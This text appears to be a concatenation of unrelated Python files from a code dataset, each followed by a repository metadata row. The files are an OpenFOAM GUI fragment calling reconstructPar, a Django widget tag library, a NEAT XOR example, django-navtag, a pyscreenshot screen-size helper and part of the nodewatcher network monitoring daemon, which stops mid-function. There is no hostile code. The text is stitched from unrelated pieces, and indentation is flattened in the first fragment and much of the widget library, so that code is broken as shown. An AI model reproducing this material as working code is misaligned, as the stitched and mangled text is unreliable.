if int(self.currtime)==0:
QtGui.QMessageBox.about(self, "ERROR", "Time step 0 already exists")
return
else:
filename1 = '%s/reconstruct.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Reconstruct',filename1)
command = 'reconstructPar -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
            w = QtGui.QMessageBox(QtGui.QMessageBox.Information,"Reconstruct Case","The case has been successfully reconstructed!")
w.exec_()
w.repaint()
QtGui.QApplication.processEvents()
return | gpl-2.0 | 8,266,735,191,862,843,000 | 43.610487 | 222 | 0.594207 | false |
palankai/xadrpy | src/xadrpy/core/templates/base.py | 1 | 3454 | from django import template
from django.utils.encoding import smart_str
import re
from django.template.base import FilterExpression, NodeList
from django.template.loader import get_template
kwarg_re = re.compile( r"(?:(\w+)=)?(.+)" )
class WidgetLibrary(template.Library):
def widget_tag_compile_function(self, cls, widget_name):
def widget_tag(parser, token):
"""
            {% xwidget 'some name' %}
            {% xwidget 'some name' as myvar %}
            {% xwidget 'some name' with 'template.html' as myvar %}
            {% xwidget 'some name' with variable as myvar %}
            {% xwidget 'some name' with-inline as myvar %}...{% endxwidget %}
            {% xwidget 'some name' with-inline %}...{% endxwidget %}
"""
bits = token.split_contents()
#widget_name = parser.compile_filter(bits[1])
args = []
kwargs = {}
asvar = None
templ = None
bits = bits[1:]
if len( bits ) >= 2 and bits[-2] == 'as':
asvar = bits[-1]
bits = bits[:-2]
if len( bits ) >=1 and bits[-1] == 'with-inline':
templ = True
bits = bits[:-1]
elif len( bits ) >=2 and bits[-2] == 'with':
templ = bits[-1]
bits = bits[:-2]
if len( bits ):
for bit in bits:
match = kwarg_re.match( bit )
if not match:
raise template.TemplateSyntaxError( "Malformed arguments to widget tag" )
name, value = match.groups()
if name:
kwargs[name] = parser.compile_filter( value )
else:
args.append( parser.compile_filter( value ) )
if templ == True:
templ = parser.parse(('end'+widget_name,))
parser.delete_first_token()
elif templ:
templ = parser.compile_filter( templ )
return cls(args, kwargs, templ, asvar)
return widget_tag
def widget(self, name):
def inner(cls):
            self.tag(name, self.widget_tag_compile_function(cls, name))
            return cls  # return the class so the decorator does not rebind its name to None
        return inner
class XWidgetBase(template.Node):
def __init__(self, args, kwargs, template, asvar):
self.args = args
self.kwargs = kwargs
self.template = template
self.asvar = asvar
def render(self, context):
def resolve(v, context):
if unicode(v)==u"False": return False
elif unicode(v)==u"True": return True
elif unicode(v)==u"None": return None
else:
return v.resolve(context)
args = [arg.resolve( context ) for arg in self.args]
kwargs = dict( [( smart_str( k, 'ascii' ), resolve(v, context) ) for k, v in self.kwargs.items()] )
if isinstance(self.template, FilterExpression):
kwargs['TEMPLATE']=get_template(self.template.resolve( context ))
if isinstance(self.template, NodeList):
kwargs['TEMPLATE']=self.template
if not self.asvar:
return self.value(context, *args, **kwargs)
context[self.asvar]=self.value(context, *args, **kwargs)
return ""
def value(self, context, *args, **kwargs):
return ""
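# Illustrative sketch (not part of the original module): how a concrete widget
# could be registered and rendered.  The names `register` and `HelloWidget`
# are hypothetical and used only for this example.
#
#   register = WidgetLibrary()
#
#   @register.widget('hello_widget')
#   class HelloWidget(XWidgetBase):
#       def value(self, context, name="world", **kwargs):
#           return u"Hello, %s!" % name
#
#   # In a template: {% hello_widget 'reader' as greeting %}{{ greeting }}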
| lgpl-3.0 | -5,177,239,194,537,481,000 | 37.808989 | 107 | 0.516503 | false |
machinebrains/neat-python | examples/xor/xor2.py | 1 | 1861 | """ 2-input XOR example """
from __future__ import print_function
from neatsociety import nn, population, statistics, visualize
# Network inputs and expected outputs.
xor_inputs = [[0, 0], [0, 1], [1, 0], [1, 1]]
xor_outputs = [0, 1, 1, 0]
def eval_fitness(genomes):
for g in genomes:
net = nn.create_feed_forward_phenotype(g)
sum_square_error = 0.0
for inputs, expected in zip(xor_inputs, xor_outputs):
# Serial activation propagates the inputs through the entire network.
output = net.serial_activate(inputs)
sum_square_error += (output[0] - expected) ** 2
# When the output matches expected for all inputs, fitness will reach
# its maximum value of 1.0.
g.fitness = 1 - sum_square_error
pop = population.Population('xor2_config')
pop.run(eval_fitness, 300)
print('Number of evaluations: {0}'.format(pop.total_evaluations))
# Display the most fit genome.
winner = pop.statistics.best_genome()
print('\nBest genome:\n{!s}'.format(winner))
# Verify network output against training data.
print('\nOutput:')
winner_net = nn.create_feed_forward_phenotype(winner)
for inputs, expected in zip(xor_inputs, xor_outputs):
output = winner_net.serial_activate(inputs)
print("expected {0:1.5f} got {1:1.5f}".format(expected, output[0]))
# Visualize the winner network and plot/log statistics.
visualize.plot_stats(pop.statistics)
visualize.plot_species(pop.statistics)
visualize.draw_net(winner, view=True, filename="xor2-all.gv")
visualize.draw_net(winner, view=True, filename="xor2-enabled.gv", show_disabled=False)
visualize.draw_net(winner, view=True, filename="xor2-enabled-pruned.gv", show_disabled=False, prune_unused=True)
statistics.save_stats(pop.statistics)
statistics.save_species_count(pop.statistics)
statistics.save_species_fitness(pop.statistics)
| bsd-3-clause | -3,919,349,984,448,292,400 | 35.490196 | 112 | 0.709833 | false |
SmileyChris/django-navtag | django_navtag/templatetags/navtag.py | 1 | 5170 | from django import template
from django.utils.encoding import smart_str
from django.utils.safestring import mark_safe
register = template.Library()
class Nav(object):
def __init__(self, tree=None, root=None):
self._root = root or self
self._tree = tree or {}
def __getitem__(self, key):
return Nav(self._tree[key], root=self._root)
def __str__(self):
return mark_safe(str(self._text))
def __bool__(self):
return bool(self._tree)
def _get_text(self):
if hasattr(self._root, "_text_value"):
return self._root._text_value
return self._tree
def _set_text(self, value):
self._root._text_value = value
_text = property(_get_text, _set_text)
def clear(self):
self._tree = {}
def update(self, *args, **kwargs):
self._tree.update(*args, **kwargs)
class NavNode(template.Node):
def __init__(self, item=None, var_for=None, var_text=None):
self.item = item
self.var_name = var_for or "nav"
self.text = var_text
def render(self, context):
first_context_stack = context.dicts[0]
nav = first_context_stack.get(self.var_name)
if nav is not context.get(self.var_name):
raise template.TemplateSyntaxError(
"'{0}' variable has been altered in current context".format(
self.var_name
)
)
if not isinstance(nav, Nav):
nav = Nav()
# Copy the stack to avoid leaking into other contexts.
new_first_context_stack = first_context_stack.copy()
new_first_context_stack[self.var_name] = nav
context.dicts[0] = new_first_context_stack
if self.text:
nav._text = self.text.resolve(context)
return ""
# If self.item was blank then there's nothing else to do here.
if not self.item:
return ""
if nav:
# If the nav variable is already set, don't do anything.
return ""
item = self.item.resolve(context)
item = item and smart_str(item)
value = True
if not item:
item = ""
for part in reversed(item.split(".")):
new_item = {}
new_item[part] = value
value = new_item
nav.clear()
nav.update(new_item)
return ""
def __repr__(self):
return "<Nav node>"
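# Note on NavNode.render() above: a dotted item such as "about_menu.info" is
# folded (from right to left) into the nested mapping
# {'about_menu': {'info': True}}, so both {% if nav.about_menu %} and
# {% if nav.about_menu.info %} evaluate as true in templates.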
@register.tag
def nav(parser, token):
"""
Handles navigation item selection.
Example usage::
{# Set the context so {{ nav.home }} (or {{ mynav.home }}) is True #}
{% nav "home" %} or {% nav "home" for mynav %}
The most basic (and common) use of the tag is to call ``{% nav [item] %}``,
where ``[item]`` is the item you want to check is selected.
By default, this tag creates a ``nav`` context variable. To use an
alternate context variable name, call ``{% nav [item] for [var_name] %}``.
Your HTML navigation template should look something like::
{% block nav %}
<ul class="nav">
<li{% if nav.home %} class="selected"{% endif %}>
<a href="/">Home</a>
</li>
<li{% if nav.about %} class="selected"{% endif %}>
<a href="/about/">About</a>
</li>
</ul>
{% endblock %}
To override this in a child template, you'd do::
        {% extends "base.html" %}
        {% load navtag %}
{% block nav %}
{% nav "about" %}
{{ block.super }}
{% endblock %}
This works for multiple levels of template inheritance, due to the fact
that the tag only does anything if the ``nav`` context variable does not
exist. So only the first ``{% nav %}`` call found will ever be processed.
As a shortcut, you can use a ``text`` argument and then just reference the
variable rather than query it with an ``{% if %}`` tag::
{% nav text ' class="active"' %}
<ul class="nav">
<li{{ nav.home }}><a href="/">Home</a></li>
<li{{ nav.about }}><a href="/about/">About</a></li>
</ul>
To create a sub-menu you can check against, simply dot-separate the item::
{% nav "about_menu.info" %}
This will be pass for both ``{% if nav.about_menu %}`` and
``{% if nav.about_menu.info %}``.
"""
bits = token.split_contents()
ok = True
keys = {"for": False, "text": True}
node_kwargs = {}
while len(bits) > 2:
value = bits.pop()
key = bits.pop()
if key not in keys:
ok = False
break
compile_filter = keys.pop(key)
if compile_filter:
value = parser.compile_filter(value)
node_kwargs["var_{0}".format(key)] = value
if len(bits) > 1:
# Text argument doesn't expect an item.
ok = "text" not in node_kwargs
item = parser.compile_filter(bits[1])
else:
item = None
if not ok:
raise template.TemplateSyntaxError("Unexpected format for %s tag" % bits[0])
return NavNode(item, **node_kwargs)
| mit | 2,733,805,172,510,658,000 | 28.20904 | 84 | 0.544874 | false |
ponty/pyscreenshot | tests/size.py | 1 | 1350 | import os
from easyprocess import EasyProcess
from pyscreenshot.util import platform_is_linux, platform_is_osx, platform_is_win
def display_size_x():
# http://www.cyberciti.biz/faq/how-do-i-find-out-screen-resolution-of-my-linux-desktop/
# xdpyinfo | grep 'dimensions:'
screen_width, screen_height = 0, 0
if not os.environ.get("DISPLAY"):
raise ValueError("missing DISPLAY variable")
xdpyinfo = EasyProcess("xdpyinfo")
xdpyinfo.enable_stdout_log = False
if xdpyinfo.call().return_code != 0:
raise ValueError("xdpyinfo error: %s" % xdpyinfo)
for x in xdpyinfo.stdout.splitlines():
if "dimensions:" in x:
screen_width, screen_height = map(int, x.strip().split()[1].split("x"))
return screen_width, screen_height
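# Illustrative note (not part of the original module): xdpyinfo prints a line
# such as "  dimensions:    1920x1080 pixels (508x285 millimeters)"; the
# parsing above takes the second whitespace-separated token and splits it on
# "x", yielding (1920, 1080).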
def display_size_osx():
from Quartz import CGDisplayBounds
from Quartz import CGMainDisplayID
mainMonitor = CGDisplayBounds(CGMainDisplayID())
return int(mainMonitor.size.width), int(mainMonitor.size.height)
def display_size_win():
from win32api import GetSystemMetrics
return int(GetSystemMetrics(0)), int(GetSystemMetrics(1))
def display_size():
if platform_is_osx():
return display_size_osx()
if platform_is_win():
return display_size_win()
if platform_is_linux():
return display_size_x()
| bsd-2-clause | 3,261,601,400,750,375,400 | 27.723404 | 91 | 0.684444 | false |
galaxor/Nodewatcher | nodewatcher/monitor/monitor.py | 1 | 45662 | #!/usr/bin/python
#
# nodewatcher monitoring daemon
#
# Copyright (C) 2009 by Jernej Kos <[email protected]>
#
# First parse options (this must be done here since they contain import paths
# that must be parsed before Django models can be imported)
import sys, os
from optparse import OptionParser
print "============================================================================"
print " nodewatcher monitoring daemon "
print "============================================================================"
parser = OptionParser()
parser.add_option('--path', dest = 'path', help = 'Path that contains nodewatcher "web" Python module')
parser.add_option('--settings', dest = 'settings', help = 'Django settings to use')
parser.add_option('--olsr-host', dest = 'olsr_host', help = 'A host with OLSR txt-info plugin running (overrides settings file)')
parser.add_option('--stress-test', dest = 'stress_test', help = 'Perform a stress test (only used for development)', action = 'store_true')
parser.add_option('--collect-simulation', dest = 'collect_sim', help = 'Collect simulation data', action = 'store_true')
parser.add_option('--update-rrds', dest = 'update_rrds', help = 'Update RRDs', action = 'store_true')
parser.add_option('--update-rrd-type', dest = 'update_rrd_type', help = 'Update RRD type (refresh, archive, switch_sources)', default = 'refresh')
parser.add_option('--update-rrd-opts', dest = 'update_rrd_opts', help = 'Update RRD options', default = '')
parser.add_option('--reverse-populate', dest = 'reverse_populate', help = 'Reverse populate RRD with data from a database', action = 'store_true')
parser.add_option('--reverse-populate-node', dest = 'rp_node', help = 'Node to populate data for')
parser.add_option('--reverse-populate-graph', dest = 'rp_graph', help = 'Graph type to populate data for')
options, args = parser.parse_args()
if not options.path:
print "ERROR: Path specification is required!\n"
parser.print_help()
exit(1)
elif not options.settings:
print "ERROR: Settings specification is required!\n"
parser.print_help()
exit(1)
elif options.reverse_populate and (not options.rp_node or not options.rp_graph):
print "ERROR: Reverse populate requires node and graph type!\n"
parser.print_help()
exit(1)
# Setup import paths, since we are using Django models
sys.path.append(options.path)
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
# Import our models
from web.nodes.models import Node, NodeStatus, Subnet, SubnetStatus, APClient, Link, GraphType, GraphItem, Event, EventSource, EventCode, IfaceType, InstalledPackage, NodeType, RenumberNotice, WarningCode, NodeWarning, Tweet
from web.generator.models import Template, Profile
from web.nodes import data_archive
from django.db import transaction, models, connection
from django.conf import settings
# Possibly override MONITOR_OLSR_HOST setting with command line option
if options.olsr_host:
settings.MONITOR_OLSR_HOST = options.olsr_host
# Import other stuff
if getattr(settings, 'MONITOR_ENABLE_SIMULATION', None) or options.stress_test:
from simulator import nodewatcher, wifi_utils
else:
from lib import nodewatcher, wifi_utils
# Setup simulation data collection
nodewatcher.COLLECT_SIMULATION_DATA = options.collect_sim
wifi_utils.COLLECT_SIMULATION_DATA = options.collect_sim
from web.monitor.rrd import *
from web.monitor import graphs
from lib.topology import DotTopologyPlotter
from lib import ipcalc
from time import sleep
from datetime import datetime, timedelta
from traceback import format_exc, print_exc
import pwd
import logging
import time
import multiprocessing
import gc
import struct
if Tweet.tweets_enabled():
from lib import bitly
WORKER_POOL = None
def safe_int_convert(integer):
"""
A helper method for converting a string to an integer.
"""
try:
return int(integer)
except:
return None
def safe_float_convert(value, precision = 3):
"""
A helper method for converting a string to a float.
"""
try:
return round(float(value), precision)
except:
return None
def safe_loadavg_convert(loadavg):
"""
A helper method for converting a string to a loadavg tuple.
"""
try:
loadavg = loadavg.split(' ')
la1min, la5min, la15min = (float(x) for x in loadavg[0:3])
nproc = int(loadavg[3].split('/')[1])
return la1min, la5min, la15min, nproc
except:
return None, None, None, None
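# Illustrative note (not part of the original module): for a /proc/loadavg
# style string such as "0.31 0.28 0.24 1/73 2331" the helper above returns
# (0.31, 0.28, 0.24, 73) -- the three load averages plus the total process
# count taken from the "running/total" field.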
def safe_uptime_convert(uptime):
"""
A helper method for converting a string to an uptime integer.
"""
try:
return int(float(uptime.split(' ')[0]))
except:
return None
def safe_date_convert(timestamp):
"""
A helper method for converting a string timestamp into a datetime
object.
"""
try:
return datetime.fromtimestamp(int(timestamp))
except:
return None
def safe_dbm_convert(dbm):
"""
A helper method for converting a string into a valid dBm integer
value. This also takes care of unsigned/signed char conversions.
"""
try:
dbm = safe_int_convert(dbm)
if dbm is None:
return None
if dbm > 127:
# Convert from unsigned char into signed one
dbm = struct.unpack("b", struct.pack("<i", dbm)[0])[0]
return dbm
except:
return None
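# Illustrative note (not part of the original module): some drivers report
# signal levels as unsigned bytes, so a raw reading of 230 is reinterpreted
# above as the signed value 230 - 256 = -26 dBm.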
@transaction.commit_on_success
def check_events():
"""
Check events that need resend.
"""
transaction.set_dirty()
Event.post_events_that_need_resend()
@transaction.commit_on_success
def check_global_statistics():
"""
Graph some global statistics.
"""
transaction.set_dirty()
# Nodes by status
nbs = {}
for s in Node.objects.exclude(node_type = NodeType.Test).values('status').annotate(count = models.Count('ip')):
nbs[s['status']] = s['count']
rra = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_nodes_by_status.rrd')
RRA.update(None, RRANodesByStatus, rra,
nbs.get(NodeStatus.Up, 0),
nbs.get(NodeStatus.Down, 0),
nbs.get(NodeStatus.Visible, 0),
nbs.get(NodeStatus.Invalid, 0),
nbs.get(NodeStatus.Pending, 0),
nbs.get(NodeStatus.Duped, 0),
graph = -2
)
# Global client count
client_count = len(APClient.objects.all())
rra = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_client_count.rrd')
RRA.update(None, RRAGlobalClients, rra, client_count, graph = -3)
def update_rrd(item):
"""
Updates a single RRD.
"""
archive = str(os.path.join(settings.MONITOR_WORKDIR, 'rra', item.rra))
conf = graphs.RRA_CONF_MAP[item.type]
# Update the RRD
RRA.convert(conf, archive, action = options.update_rrd_type, opts = options.update_rrd_opts, graph = item.pk)
def update_rrds():
"""
Updates RRDs.
"""
# We must close the database connection before we fork the worker pool, otherwise
# resources will be shared and problems will arise!
connection.close()
pool = multiprocessing.Pool(processes = settings.MONITOR_GRAPH_WORKERS)
try:
pool.map(update_rrd, GraphItem.objects.all()[:])
# Don't forget the global graphs
rra_status = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_nodes_by_status.rrd')
rra_clients = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_client_count.rrd')
RRA.convert(RRANodesByStatus, rra_status, action = options.update_rrd_type, graph = -2)
RRA.convert(RRAGlobalClients, rra_clients, action = options.update_rrd_type, graph = -3)
except:
logging.warning(format_exc())
pool.close()
pool.join()
@transaction.commit_on_success
def check_dead_graphs():
"""
Checks for dead graphs.
"""
GraphItem.objects.filter(dead = False, last_update__lt = datetime.now() - timedelta(minutes = 10)).update(
dead = True,
need_redraw = True
)
# Remove RRDs that need removal
for graph in GraphItem.objects.filter(need_removal = True):
try:
os.unlink(os.path.join(settings.MONITOR_WORKDIR, 'rra', graph.rra))
except:
pass
GraphItem.objects.filter(need_removal = True).delete()
def generate_new_node_tweet(node):
"""
Generates a tweet when a new node connects to the network.
"""
if not Tweet.tweets_enabled():
return
try:
bit_api = bitly.Api(login=settings.BITLY_LOGIN, apikey=settings.BITLY_API_KEY)
node_link = bit_api.shorten(node.get_full_url())
msg = "A new node %s has just connected to the network %s" % (node.name, node_link)
Tweet.post_tweet(node, msg)
except:
logging.warning("%s/%s: %s" % (node.name, node.ip, format_exc()))
@transaction.commit_on_success
def process_node(node_ip, ping_results, is_duped, peers, varsize_results):
"""
Processes a single node.
@param node_ip: Node's IP address
@param ping_results: Results obtained from ICMP ECHO tests
@param is_duped: True if duplicate echos received
@param peers: Peering info from routing daemon
@param varsize_results: Results of ICMP ECHO tests with variable payloads
"""
transaction.set_dirty()
try:
n = Node.get_exclusive(ip = node_ip)
except Node.DoesNotExist:
# This might happen when we were in the middle of a renumbering and
# did not yet have access to the node. Then after the node has been
# renumbered we gain access, but the IP has been changed. In this
# case we must ignore processing of this node.
return
grapher = graphs.Grapher(n)
oldStatus = n.status
old_last_seen = n.last_seen
# Determine node status
if ping_results is not None:
n.status = NodeStatus.Up
n.rtt_min, n.rtt_avg, n.rtt_max, n.pkt_loss = ping_results
# Add RTT graph
grapher.add_graph(GraphType.RTT, 'Latency', 'latency', n.rtt_avg, n.rtt_min, n.rtt_max)
# Add uptime credit
if n.uptime_last:
n.uptime_so_far = (n.uptime_so_far or 0) + (datetime.now() - n.uptime_last).seconds
n.uptime_last = datetime.now()
else:
n.status = NodeStatus.Visible
# Measure packet loss with different packet sizes and generate a graph
if ping_results is not None and varsize_results is not None:
losses = [n.pkt_loss] + varsize_results
grapher.add_graph(GraphType.PacketLoss, 'Packet Loss', 'packetloss', *losses)
if is_duped:
n.status = NodeStatus.Duped
NodeWarning.create(n, WarningCode.DupedReplies, EventSource.Monitor)
# Generate status change events
if oldStatus in (NodeStatus.Down, NodeStatus.Pending, NodeStatus.New) and n.status in (NodeStatus.Up, NodeStatus.Visible):
if oldStatus in (NodeStatus.New, NodeStatus.Pending):
n.first_seen = datetime.now()
if n.node_type == NodeType.Wireless:
generate_new_node_tweet(n)
Event.create_event(n, EventCode.NodeUp, '', EventSource.Monitor)
elif oldStatus != NodeStatus.Duped and n.status == NodeStatus.Duped:
Event.create_event(n, EventCode.PacketDuplication, '', EventSource.Monitor)
# Add olsr peer count graph
grapher.add_graph(GraphType.OlsrPeers, 'Routing Peers', 'olsrpeers', n.peers)
# Add LQ/ILQ/ETX graphs
if n.peers > 0:
etx_avg = lq_avg = ilq_avg = 0.0
for peer in n.get_peers():
lq_avg += float(peer.lq)
ilq_avg += float(peer.ilq)
etx_avg += float(peer.etx)
lq_graph = grapher.add_graph(GraphType.LQ, 'Average Link Quality', 'lq', ilq_avg / n.peers, lq_avg / n.peers)
etx_graph = grapher.add_graph(GraphType.ETX, 'Average ETX', 'etx', etx_avg / n.peers)
for peer in n.get_peers():
# Link quality
grapher.add_graph(
GraphType.LQ,
'Link Quality to {0}'.format(peer.dst),
'lq_peer_{0}'.format(peer.dst.pk),
peer.ilq,
peer.lq,
name = peer.dst.ip,
parent = lq_graph
)
# ETX
grapher.add_graph(
GraphType.ETX,
'ETX to {0}'.format(peer.dst),
'etx_peer_{0}'.format(peer.dst.pk),
peer.etx,
name = peer.dst.ip,
parent = etx_graph
)
n.last_seen = datetime.now()
# Attempt to fetch data from nodewatcher
info = nodewatcher.fetch_node_info(node_ip)
# XXX This is an ugly hack for server-type nodes, but it will be fixed by modularization
# rewrite anyway, so no need to make it nice
if n.node_type == NodeType.Server and info is not None and 'iface' in info:
try:
# Record interface traffic statistics for all interfaces
for iid, iface in info['iface'].iteritems():
grapher.add_graph(
GraphType.Traffic,
'Traffic - {0}'.format(iid),
'traffic_{0}'.format(iid),
iface['up'],
iface['down'],
name = iid
)
except:
pass
info = None
# Check if we have fetched nodewatcher data
if info is not None and 'general' in info:
try:
oldUptime = n.uptime or 0
oldChannel = n.channel or 0
oldVersion = n.firmware_version
n.firmware_version = info['general']['version']
n.local_time = safe_date_convert(info['general']['local_time'])
n.bssid = info['wifi']['bssid']
n.essid = info['wifi']['essid']
n.channel = nodewatcher.frequency_to_channel(info['wifi']['frequency'])
n.clients = 0
n.uptime = safe_uptime_convert(info['general']['uptime'])
# Treat missing firmware version file as NULL version
if n.firmware_version == "missing":
n.firmware_version = None
# Validate BSSID and ESSID
if n.bssid != "02:CA:FF:EE:BA:BE":
NodeWarning.create(n, WarningCode.BSSIDMismatch, EventSource.Monitor)
try:
if n.essid != n.configured_essid:
NodeWarning.create(n, WarningCode.ESSIDMismatch, EventSource.Monitor)
except Project.DoesNotExist:
pass
if 'uuid' in info['general']:
n.reported_uuid = info['general']['uuid']
if n.reported_uuid and n.reported_uuid != n.uuid:
NodeWarning.create(n, WarningCode.MismatchedUuid, EventSource.Monitor)
if oldVersion != n.firmware_version:
Event.create_event(n, EventCode.VersionChange, '', EventSource.Monitor, data = 'Old version: %s\n New version: %s' % (oldVersion, n.firmware_version))
if oldUptime > n.uptime:
Event.create_event(n, EventCode.UptimeReset, '', EventSource.Monitor, data = 'Old uptime: %s\n New uptime: %s' % (oldUptime, n.uptime))
# Setup reboot mode for further graphs as we now know the node has
# been rebooted
grapher.enable_reboot_mode(n.uptime, old_last_seen)
if oldChannel != n.channel and oldChannel != 0:
Event.create_event(n, EventCode.ChannelChanged, '', EventSource.Monitor, data = 'Old channel: %s\n New channel %s' % (oldChannel, n.channel))
try:
if n.channel != n.profile.channel:
NodeWarning.create(n, WarningCode.ChannelMismatch, EventSource.Monitor)
except Profile.DoesNotExist:
pass
if n.has_time_sync_problems():
NodeWarning.create(n, WarningCode.TimeOutOfSync, EventSource.Monitor)
if 'errors' in info['wifi']:
error_count = safe_int_convert(info['wifi']['errors'])
if error_count != n.wifi_error_count and error_count > 0:
Event.create_event(n, EventCode.WifiErrors, '', EventSource.Monitor, data = 'Old count: %s\n New count: %s' % (n.wifi_error_count, error_count))
n.wifi_error_count = error_count
if 'net' in info:
loss_count = safe_int_convert(info['net']['losses']) if 'losses' in info['net'] else 0
if loss_count != n.loss_count and loss_count > 1:
Event.create_event(n, EventCode.ConnectivityLoss, '', EventSource.Monitor, data = 'Old count: %s\n New count: %s' % (n.loss_count, loss_count))
n.loss_count = loss_count
# Check VPN configuration
if 'vpn' in info['net']:
n.vpn_mac = info['net']['vpn']['mac'] or None
try:
offset = -3
unit = 1000
if 'Kbit' in info['net']['vpn']['upload_limit']:
offset = -4
unit = 1
upload_limit = safe_int_convert(info['net']['vpn']['upload_limit'][:offset]) // unit
except TypeError:
upload_limit = None
if n.vpn_mac and n.vpn_mac != n.vpn_mac_conf:
NodeWarning.create(n, WarningCode.VPNMacMismatch, EventSource.Monitor)
try:
if upload_limit != n.profile.vpn_egress_limit:
NodeWarning.create(n, WarningCode.VPNLimitMismatch, EventSource.Monitor)
except Profile.DoesNotExist:
pass
# Parse nodogsplash client information
oldNdsStatus = n.captive_portal_status
if 'nds' in info:
if 'down' in info['nds'] and info['nds']['down'] == '1':
n.captive_portal_status = False
# Create a node warning when captive portal is down and the node has it
# selected in its image generator profile
try:
if n.project.captive_portal and n.has_client_subnet():
NodeWarning.create(n, WarningCode.CaptivePortalDown, EventSource.Monitor)
except Profile.DoesNotExist:
pass
else:
n.captive_portal_status = True
for cid, client in info['nds'].iteritems():
if not cid.startswith('client'):
continue
try:
c = APClient.objects.get(node = n, ip = client['ip'])
except APClient.DoesNotExist:
c = APClient(node = n)
n.clients_so_far += 1
n.clients += 1
c.ip = client['ip']
c.connected_at = safe_date_convert(client['added_at'])
c.uploaded = safe_int_convert(client['up'])
c.downloaded = safe_int_convert(client['down'])
c.last_update = datetime.now()
c.save()
else:
n.captive_portal_status = True
# Check for captive portal status change
if n.has_client_subnet():
if oldNdsStatus and not n.captive_portal_status:
Event.create_event(n, EventCode.CaptivePortalDown, '', EventSource.Monitor)
elif not oldNdsStatus and n.captive_portal_status:
Event.create_event(n, EventCode.CaptivePortalUp, '', EventSource.Monitor)
# Generate a graph for number of wifi cells
if 'cells' in info['wifi']:
grapher.add_graph(GraphType.WifiCells, 'Nearby WiFi Cells', 'wificells', safe_int_convert(info['wifi']['cells']) or 0)
# Update node's MAC address on wifi iface
if 'mac' in info['wifi']:
n.wifi_mac = info['wifi']['mac']
# Update node's RTS and fragmentation thresholds
if 'rts' in info['wifi'] and 'frag' in info['wifi']:
n.thresh_rts = safe_int_convert(info['wifi']['rts']) or 2347
n.thresh_frag = safe_int_convert(info['wifi']['frag']) or 2347
# Check node's multicast rate
if 'mcast_rate' in info['wifi']:
rate = safe_int_convert(info['wifi']['mcast_rate'])
if rate != 5500:
NodeWarning.create(n, WarningCode.McastRateMismatch, EventSource.Monitor)
# Check node's wifi bitrate, level and noise
if 'signal' in info['wifi']:
bitrate = safe_int_convert(info['wifi']['bitrate'])
signal = safe_dbm_convert(info['wifi']['signal'])
noise = safe_dbm_convert(info['wifi']['noise'])
snr = float(signal) - float(noise)
grapher.add_graph(GraphType.WifiBitrate, 'WiFi Bitrate', 'wifibitrate', bitrate)
grapher.add_graph(GraphType.WifiSignalNoise, 'WiFi Signal/Noise', 'wifisignalnoise', signal, noise)
grapher.add_graph(GraphType.WifiSNR, 'WiFi Signal/Noise Ratio', 'wifisnr', snr)
# Check for IP shortage
wifi_subnet = n.subnet_set.filter(gen_iface_type = IfaceType.WiFi, allocated = True)
if wifi_subnet and n.clients > max(0, ipcalc.Network(wifi_subnet[0].subnet, wifi_subnet[0].cidr).size() - 4):
Event.create_event(n, EventCode.IPShortage, '', EventSource.Monitor, data = 'Subnet: %s\n Clients: %s' % (wifi_subnet[0], n.clients))
NodeWarning.create(n, WarningCode.IPShortage, EventSource.Monitor)
# Fetch DHCP leases when available
lease_count = 0
if 'dhcp' in info:
per_subnet_counts = {}
for cid, client in info['dhcp'].iteritems():
if not cid.startswith('client'):
continue
# Determine which subnet this thing belongs to
client_subnet = n.subnet_set.ip_filter(ip_subnet__contains = client['ip'])
if client_subnet:
client_subnet = client_subnet[0]
per_subnet_counts[client_subnet] = per_subnet_counts.get(client_subnet, 0) + 1
else:
# TODO Subnet is not announced by this node - potential problem, but ignore for now
pass
lease_count += 1
# Check for IP shortage
for client_subnet, count in per_subnet_counts.iteritems():
if count > ipcalc.Network(client_subnet.subnet, client_subnet.cidr).size() - 4:
            Event.create_event(n, EventCode.IPShortage, '', EventSource.Monitor, data = 'Subnet: {0}\n Leases: {1}'.format(client_subnet, count))
NodeWarning.create(n, WarningCode.IPShortage, EventSource.Monitor)
# Generate a graph for number of clients
if 'nds' in info or lease_count > 0:
grapher.add_graph(GraphType.Clients, 'Connected Clients', 'clients', n.clients, lease_count)
# Record interface traffic statistics for all interfaces
for iid, iface in info['iface'].iteritems():
if iid not in ('wifi0', 'wmaster0'):
# Check mappings for known wifi interfaces so we can handle hardware changes while
# the node is up and not generate useless intermediate graphs
try:
if n.profile:
iface_wifi = n.profile.template.iface_wifi
if Template.objects.filter(iface_wifi = iid).count() >= 1:
iid = iface_wifi
except Profile.DoesNotExist:
pass
grapher.add_graph(GraphType.Traffic, 'Traffic - %s' % iid, 'traffic_%s' % iid, iface['up'], iface['down'], name = iid)
# Generate load average statistics
if 'loadavg' in info['general']:
n.loadavg_1min, n.loadavg_5min, n.loadavg_15min, n.numproc = safe_loadavg_convert(info['general']['loadavg'])
grapher.add_graph(GraphType.LoadAverage, 'Load Average', 'loadavg', n.loadavg_1min, n.loadavg_5min, n.loadavg_15min)
grapher.add_graph(GraphType.NumProc, 'Number of Processes', 'numproc', n.numproc)
# Generate free memory statistics
if 'memfree' in info['general']:
n.memfree = safe_int_convert(info['general']['memfree'])
buffers = safe_int_convert(info['general'].get('buffers', 0))
cached = safe_int_convert(info['general'].get('cached', 0))
grapher.add_graph(GraphType.MemUsage, 'Memory Usage', 'memusage', n.memfree, buffers, cached)
# Generate solar statistics when available
if 'solar' in info and all([x in info['solar'] for x in ('batvoltage', 'solvoltage', 'charge', 'state', 'load')]):
states = {
'boost' : 1,
'equalize' : 2,
'absorption' : 3,
'float' : 4
}
for key, value in info['solar'].iteritems():
if not value.strip():
info['solar'][key] = None
grapher.add_graph(GraphType.Solar, 'Solar Monitor', 'solar',
info['solar']['batvoltage'],
info['solar']['solvoltage'],
info['solar']['charge'],
states.get(info['solar']['state']),
info['solar']['load']
)
# Generate statistics for environmental data
if 'environment' in info:
for key, value in info['environment'].iteritems():
if not key.startswith('sensor'):
continue
if 'temp' in value:
temp = safe_float_convert(value['temp'])
serial = value['serial']
grapher.add_graph(GraphType.Temperature, 'Temperature ({0})'.format(serial), 'temp_{0}'.format(serial), temp, name = serial)
